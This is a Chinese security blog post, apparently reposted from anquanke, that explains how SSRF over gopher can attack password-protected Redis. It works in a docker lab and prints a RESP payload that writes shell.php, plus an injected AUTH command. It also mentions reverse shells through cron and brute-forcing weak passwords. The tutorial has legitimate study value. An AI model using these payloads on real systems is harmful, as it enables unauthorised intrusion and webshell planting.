ssrf攻击mysql_浅析SSRF认证攻击Redis

最新推荐文章于 2024-02-06 14:30:00 发布
最新推荐文章于 2024-02-06 14:30:00 发布
阅读量137 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39679718/article/details/114470734
版权

前段时间evoA师傅提到了SSRF可以攻击有密码认证的Redis服务,网上的文章大部分都是未授权打Redis,而有关SSRF认证攻击Redis的文章很少,在这里简单分析一下,如有错误还望斧正。

SSRF

SSRF漏洞的原理是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务,我们可以用其探测内网信息、攻击内网应用、穿透防火墙、读取任意文件等。

这里我们演示的是攻击内网Redis应用,类似的还有未授权攻击Mysql服务等。

SSRF未授权攻击Redis

当存在SSRF漏洞且内网中Redis服务可以未授权访问时,我们可以利用gopher协议构造tcp报文发送一系列请求来攻击Redis服务。

常见的几种攻击方式:利用计划任务执行命令反弹shell

写ssh-keygen公钥然后使用私钥登陆

往web物理路径写webshell

网上一堆利用文章,这里不再阐述,这里主要分析未授权攻击的数据包。

pull一个redis服务的docker容器

docker pull ju5ton1y/redis

docker run -d -p 8001:6379 ju5ton1y/redis

设置未授权

sed -i 's/requirepass 123123/#requirepass 123123/g' /etc/redis.conf

docker restart id

进入容器

apt-get install tcpdump

tcpdump -i eth0 port 6379 -o nopass.pcap

利用工具生成payload,直接打即可。

通过翻阅官网文档https://redis.io/topics/protocol,可以看到Redis使用的是RESP协议

(ps:英语太渣,谷歌翻译可能不太准确,具体可直接看原文。)

可以看到客户端将命令发送到Redis服务器的流程为客户端向Redis服务器发送一个仅由Bulk Strings组成的RESP Arrays。

Redis服务器回复发送任何有效RESP数据类型作为回复的客户端。

Bulk Strings用于表示长度最大为512 MB的单个二进制安全字符串,按以下方式编码:一个$字节后跟组成字符串的字节数(一个前缀长度),由CRLF终止。

实际的字符串数据。

最终的CRLF。

字符串foobar的编码如下:$6rnfoobarrn。

RESP Arrays使用以下格式发送:一个*字符作为第一个字节,后跟数组中的元素数作为十进制数,后跟CRLF。

数组中的每个元素都附加RESP类型。

现在数据包中的每一行数据就好理解了。每一个*number代表每一行命令,number代表每行命令中数组中的元素个数。$number代表每个元素的长度。

*1 $8 flushall *3 $3 set $1 1 $22 <?php phpinfo();?> *4 $6 config $3 set $3 dir $4 /tmp *4 $6 config $3 set $10 dbfilename $9 shell.php *1 $4 save

SSRF认证攻击Redis

sed -i 's/#requirepass 123123/requirepass 123123/g' /etc/redis.conf

docker restart id

进入容器tcpdump -i eth0 port 6379 -o havepass.pcap

本地客户端发送命令到容器6379端口

随便查看部分tcp流

可以看到在发送请求之前都发送了下面这条命令用来认证

*2 $4 AUTH $6 123123

在官方文档中提到Redis是Request-Response model.

A client can use the same connection in order to issue multiple commands. Pipelining is supported so multiple commands can be sent with a single write operation by the client, without the need to read the server reply of the previous command before issuing the next one. All the replies can be read at the end..

大致意思是说Redis客户端支持管道操作,可以通过单个写入操作发送多个命令,而无需在发出下一个命令之前读取上一个命令的服务器回复。所有的回复都可以在最后阅读。

这也是Redis在认证情况下依然可以被攻击到原因。

重新构造数据包,添加%2A2%0d%0a%244%0d%0aAUTH%0d%0a%246%0d%0a123123%0D%0A

测试

可以看到写入成功

后记

在渗透环境中假如找到了SSRF漏洞且内网中开着有认证的Redis服务,我们可以写个脚本用弱口令跑一波SSRF认证攻击Redis,说不定会有突破。

登录安全客 - 有思想的安全新媒体http://www.anquanke.com/,或加入交流群814450983、下载安全客APP来获取更多最新资讯吧~

原文链接:浅析SSRF认证攻击Redis - 安全客,安全资讯平台​www.anquanke.coma34c285520b0272f63695572f3062725.png

网络安全

weixin_39679718
关注
ssrf dict MySQL_ssrf漏洞利用(内网探测、打redis)
weixin_35678674的博客
02-22 1145
摘要:存在ssrf漏洞的站点主要利用四个协议,分别是http、file、gopher、dict协议。file协议拿来进行本地文件的读取,http协议拿来进行内网的ip扫描、端口探测,如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务(一般开放了这个端口的是redis服务),原理是利用他们以目标机的身份执行对开启redis服务的内网机执...
SSRF漏洞之Redis利用篇
weixin_39664643的博客
01-21 3359
SSRF漏洞之Redis利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网Redis服务可以授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
ssrf打mysql_浅析SSRF认证攻击Redis
weixin_31134719的博客
02-22 211
原标题:浅析SSRF认证攻击Redis 前段时间evoA师傅提到了SSRF可以攻击有密码认证Redis服务,网上的文章大部分都是授权Redis,而有关SSRF认证攻击Redis的文章很少,在这里简单分析一下,如有错误还望斧正。SSRFSSRF漏洞的原理是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务,我们可以用其探测内网信息、攻击内网应用、穿透防火墙、读取任意文件等。这里我们演示的...
SSRF利用 Gopher |Gopher攻击mysql及内网
crispr的博客
06-23 5399
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
mysql ssrf_ssrf与mysql爱恨情仇
weixin_33122261的博客
01-19 213
SSRF与Mysql0x01域名:端口:80 443 22cms指纹:HisiPHP源码:后台:物理路径:/var/www/html/www.xxx.io/public/index.phpApache:配置不当存在遍历0x02通过对区块浏览器抓包发现一个远程调用接口猜测并确认该点存在ssrf漏洞继续确认这里我就能100%确定该地方存在ssrf 到了这里我们就可以开始端口扫描了然后使用burp得In...
SSRF漏洞理解进阶&SSRF+gopher打内网(redismysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8490
SSRF漏洞理解进阶&SSRF+gopher打内网(redismysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
SSRF_Vulnerable_Lab-master.zip
10-21
备份,github:https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
ssrfpll.rar_DQ 锁相环_SSRF-PLL_同步锁相环_锁相环_锁相环 同步
07-14
基于同步坐标系的自建锁相环模块仿真,dq坐标系与matlab自带模块相差90度,新建的dq坐标系是符合式习惯坐标系
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
mysql ssrf_ssrf攻击内网应用
weixin_36257799的博客
02-17 456
一、weblogic ssrf攻击redisWeblogic存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进一步实现端口探测。该漏洞存在于/uddiexplorer/SearchPublicRegistries.jsp,我们使用burpsuite访问如下url进行测试。http://192.168.80.170:35402/uddiexplorer/SearchPublicRegis...
SSRF攻击Redis
cosmoslin的博客
10-27 1397
Redis简介 Redis数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
网络安全学习阶段性总结:SQL注入|SSRF攻击|OS命令注入|身份验证漏洞|事物逻辑漏洞|目录遍历漏洞...
Zeker62的博客
08-21 549
目录SQL注入什么是SQL注入?掌握SQL注入之前需要了解的知识点SQL注入情况流程分析有完整的回显报错(最简单的情况)——检索数据:在HTTP报文利用注释———危险操作检索隐藏数据:SQL注入导致逻辑漏洞SQL注入重点——盲注!通过触发条件响应来实现SQL盲注通过触发布尔错误实现SQL盲注——布尔盲注通过触发时间延迟实现SQL盲注——时延盲注通过OAST进行盲注——最终大招双注入SSRF 攻...
利用SSRF攻击Redis
LUOBIKUN的博客
10-20 4663
SSRF漏洞+redis前置知识实验环境搭建SSRF攻击Redis通过redis写入ssh公钥,获取操作系统权限;直接向Web目录写webshell;linux计划任务执行命令反弹shell。 前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令; 2,相关协议,例如dict://协议和gother协议的使用 dict://协议 词典网络协议,在RFC 2009进行描述。它的目标是超越Webster protocol,并允许客户端
Weblogic - SSRF攻击内网redis服务漏洞
HAKUNAMATATATTA的博客
12-05 1148
SSRF(Server-Side Request Forgery),服务端请求伪造,是一种由攻击者构造形成由服务端发起请求的一个漏洞,一般情况下,SSRF攻击的目标是从外部网络无法访问的内部系统。
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2411
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
SSRF攻击Redis写入webshell
内心不种满鲜花就会长满杂草
05-19 6675
目录 攻击环境设计 redis服务器搭建 dict探测内网端口 利用gopher协议写入webshell 关于ssrf攻击,传送门 -》SSRF漏洞原理与利用方式。当我们检测出一个网站存在SSRF漏洞的时候,我们就可以探测当前主机开放的端口,而这些端口往往我们从外网是不能直接探测到的,所以可以尝试利用ssrf探测内网开放的端口。 漏洞利用前提: 知道网站根目录,这里假设知道了根目录 根目录具有写文件的权限 攻击环境设计 操作系统:win2012 SSRF漏洞环境搭建,利用皮卡丘靶场 .
ssrf漏洞攻击内网Redis复现
懂进攻知防守
07-21 1138
SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。大都是由于服务端提供了从其他服务器获取数据的功能,比如使用户从指定的URLweb应用获取图片、下载文件、读取文件内容等。.........
ssrf漏洞利用(内网探测、打redis)
最新发布
Javachichi的博客
02-06 2109
声明该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。滑至文末,获取“searchall”下载链接!
SSRFRedis的利用
2301_80127209的博客
01-23 1420
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值